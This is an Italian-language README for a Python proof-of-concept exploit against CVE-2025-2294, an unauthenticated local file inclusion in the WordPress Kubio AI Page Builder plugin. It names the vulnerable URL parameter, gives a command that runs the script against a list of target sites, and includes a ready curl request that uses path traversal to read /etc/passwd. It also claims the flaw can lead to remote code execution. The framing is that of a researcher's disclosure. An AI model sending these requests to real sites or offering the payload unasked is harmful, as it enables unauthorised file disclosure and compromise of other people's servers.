
Python PoC per CVE-2025-2294, una Local File Inclusion non autenticata nel plugin WordPress Kubio AI Page Builder (≤2.5.1), che dimostra la divulgazione arbitraria di file e una potenziale esecuzione remota di codice.
CVE-2025-2294 è una vulnerabilità critica 🔥 di Local File Inclusion (LFI) che colpisce il plugin Kubio AI Page Builder per WordPress (versioni fino alla 2.5.1 inclusa). Questa falla consente ad attaccanti remoti non autenticati 👾 di includere file arbitrari sul server tramite il parametro URL __kubio-site-edit-iframe-classic-template.
Sfruttando questa vulnerabilità si può ottenere la divulgazione di file sensibili 📂, esecuzione di codice remoto 💥 e compromissione totale del sistema 💀.
Muhammad Nizar — Ricercatore di sicurezza 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
Sentiti libero di contattarmi per domande o collaborazioni! 🤝
Esegui lo script di exploit con un elenco di URL target:
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"